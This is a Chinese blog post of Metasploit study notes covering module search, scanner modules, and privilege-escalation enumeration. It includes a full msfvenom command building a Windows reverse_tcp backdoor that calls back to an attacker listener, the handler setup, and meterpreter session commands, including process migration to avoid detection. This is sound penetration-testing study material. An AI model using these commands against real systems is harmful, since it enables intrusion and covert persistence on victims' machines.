更新中

一.基础:

shell中直接输入msfconsole开始运行

  • use +模块路径 使用模块
  • search+模块关键字 用来搜索模块
  • back 返回主界面

模块中:

  • info 查看模块信息

  • show options 查看模块设置项

  • show targets 显示可选择的target(targert更像是给你选项,你去细化攻击细节,但是明明目标机器是64位系统,我选择target为64攻击不匹配,但是选择86却攻击成功,为什么呢?这个问题解决了,因为生成木马的时候会有生成64位还是32位的选项,默认是32位,也就是×86,因为木马是×86,既然x86的木马执行成功了,选择target自然也是x86

  • expolit/run 开始执行

高级设置:

set AutoRunScript migrate -f 自动迁移进程

二.信息收集:

主机存活探测:auxiliary/scanner/discovery/arp_sweep ARP 扫描auxiliary/scanner/discovery/udp_sweep UDP 扫描auxiliary/scanner/netbios/nbname NETBIOS 扫描auxiliary/scanner/snmp/snmp_enum SNMP 扫描auxiliary/scanner/smb/smb_version SMB 扫描端口扫描:auxiliary/scanner/portscan/ack TCP ACK 端口扫描auxiliary/scanner/portscan/ftpbounce FTP bounce 端口扫描auxiliary/scanner/portscan/syn SYN 端口扫描auxiliary/scanner/portscan/tcp TCP 端口扫描auxiliary/scanner/portscan/xmas TCP XMas 端口扫描

使用方法:1.用内网的机器开个代理,使kali的流量可以到达内网,然后使用模块扫描2.使用后门连接,通过session进行扫描3.在同一个内网里面可以直接扫描(一般不会有这种情况吧,除非我带着电脑潜入目标地点)这三点适用于内网渗透的很多场景

三.渗透

3.1反向后门的使用

我的话:

反弹shell是等受害机器来连接我,所以我在这里的设置,不需要去设置受害机器的ip,因为只要受害机器知道来哪里找我就行了

生成反向后门:

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.43.43 lport=18888 -f exe >gg.exe

高亮为可设置参数,

lhost是监听机ip地址(也就是攻击者kali的ip地址)lport是监听端口(也就是攻击者准备接收反弹回来的shell的那个端口)

监听后门:

use exploit/multi/handler

use exploit/multi/handler   #通过use选择监听模块
set payload windows/meterpreter/reverse_tcp  #选择设置反弹shell的监听(这一步我有几次忽略了,导致出现错误,连接失败,所以这一步一定不要落下,设置监听的类型)
set lhost 192.168.43.43   #这里的ip和端口应该和后门代码保持一致
set lport 18888
exploit   #开始执行

meterpreter

获取到shell后,会为被控制的机器开启一个session(会话),msf可以同时监听多个session,并且在不同的session之间随意切换,黑客在session中执行命令等同于在目标主机执行命令,也可以使用msf的攻击模块通过session对目标主机进行攻击。在session中执行命令的模式也被称为meterpreter模式

session中:getuid #获取当前用户的权限吧,看演示里面一般是作这个用的migrate [进程号] #将后门进程迁移到其它进程里面,达到权限维持的效果(更不容易被发现)help        #可以显示在meterpreter模式下可以操作的指令列表(一部分)search [-d dir] [-r recurse] -f pattern   #在被控制的机器内搜索文件shell   #得到终端background     #把session放置后台ps    #列出所有进程,以及进程的信息(在这里可以看到pid,知道pid就可以使用kill来终止进程了)session外:session -l  #列出当前的所有session以及其信息
sessions -K   #关闭所有session连接,这里的k是大写
sessions -k [指定session的id]  #杀死指定id的session
sessions [id号]  #根据id号进入不同的session

3.2提权

补丁查询:

run post/windows/gather/enum_patches 查询补丁信息use post/multi/recon/local_exploit_suggester 这个模块可通过session查询当前可以用来提权的exp,(可能会失灵)

msf常用模块功能整理相关推荐

  1. python中threading模块详解及常用方法_Python常用模块功能简介(二)threading

    threading模块基本用法 threading.Thread.join函数解释 threading.Thread.join(timeout=None)调用该函数的线程会阻塞调用该线程的主线程和其它 ...

  2. python logging模块的作用及应用场景_Python常用模块功能简介(三)logging

    logging基本介绍 先介绍一下我们为什么要使用日志,平常我们编写程序为了验证程序运行与debug,通常会使用print函数来对一些中间结果进行输出验证,在验证成功后再将print语句注释或删除掉. ...

  3. 【MSFconsole工具】下载、启动方法、msf常用基础命令、模块功能、核心命令(入门初识)

    目录 一.简介: 二.下载: 2.1.kali 2.2.官网: 2.3.GitHub: 三.启动方法 四.msf常用基础命令 五.msf结构 六. 核心命令: 一.简介: 很容易地获取.开发并对计算机 ...

  4. ansible安装部署和配置、常用模块整理

    今天心情不错~~~~第25个生日了,又遇昨晚百年难得一见的蓝月亮,所以昨晚连夜整理了文档, 会分为两部分发出去,ansible批量化部署在工作中是非常实用,建议呢 整理大量常用模块去练习 1.1.1  ...

  5. guns常用功能整理

    guns常用功能整理 guns常用功能整理 一.ajax接口请求(常用) 1.1:引入插件库 1.2:调用即可 二.es6模块调用 2.1:当前文件下使用 2.2:封装的代码暴露出去 三.创建temp ...

  6. 个人整理一些开发中比较常用的功能网址

    在这里整理一些比较常用的功能网址,方便以后遇到同样的问题能够快速的找到答案,希望也能帮到大家. 计算两个时间差 https://blog.csdn.net/leeyefang/article/deta ...

  7. Python学习 - 常用模块(二)

    目录 一. 常用模块 - hashlib 二. 常用模块 - hmac 三. 常用模块 - logging 四. 常用模块 - re 五. 常用模块 - requests 六. 常用模块 - para ...

  8. matplotlib一些常用知识点的整理,

    本文作为学习过程中对matplotlib一些常用知识点的整理,方便查找. 强烈推荐ipython 无论你工作在什么项目上,IPython都是值得推荐的.利用ipython --pylab,可以进入Py ...

  9. Python自学——python的常用模块

    Python学习--python的常用模块 原文作者:佛山小程序员 原文链接:https://blog.csdn.net/weixin_44192923/article/details/8656325 ...

最新文章

  1. 基于MATLAB的交流电动机调速系统仿真
  2. D. Best Edge Weight(最小生成树 + 树链剖分)(Codeforces Round #423 (Div. 1, rated, based on VK Cup Finals))
  3. Linux系统编程(四)信号
  4. 怎么调节Ubuntu系统的屏幕亮度
  5. 由href return false 来看阻止默认事件
  6. [转] Official Microsoft Team Blogs / Microsoft Blogs
  7. zabbix监控主动模式、被动模式、添加监控主机、添加自定义模板、处理图形乱码、自动发现...
  8. RS485通信原理图及程序实例详解
  9. Java 常见异常类
  10. 如何用计算机函数计算房租,Excel商铺租金模板,租金每两年递增5%,具备收租期、租赁起止期、单价函数自动计算功能...
  11. python 操作微信 群发_python实现给微信公众号发送消息的方法
  12. 佛山科学技术学院计算机科学与技术李欣华,第七届国务院学位委员会中文学科评议组2019年度 扩大会议在佛山科学技术学院召开...
  13. 个人应对冲突的五种策略
  14. 传说中的100句子记忆7000单词(51-100句)
  15. python热力图参数_python3.5数据处理——百度地图热力图传值
  16. 腾讯位置服务模仿微信发送位置功能
  17. APICloud:让开发移动应用像拼积木一样简单
  18. 运放:运放+TL431+MOS 构成的恒流电路
  19. Spanish FF Live Support
  20. asp.net 的 web form 过时了吗?

热门文章

  1. 荒野今天维护服务器吗,荒野行动1月29日为什么无法登录原因 今天停服更新维护吗?...
  2. 对于目标检测中mAP@0.5的理解
  3. 微信开放平台开源_开源的价值在于开放的开发过程
  4. 【设计教程】photoshop自由变形工具,透视工具的使用!
  5. 无状态,无连接的理解
  6. 01 APP被苹果APPStore拒绝的各种原因
  7. 笔试 | 东方财富 2020 春季校园招聘后端开发在线笔试【Python】【C++】【字符串】【动态规划】
  8. 微视点:网传社交游戏公司“五分钟”面临倒闭,引发各方热议
  9. 苹果12轻点背面不灵敏如何解决
  10. php微信公众号支付实例教程,PHP微信公众号支付教程(含图文)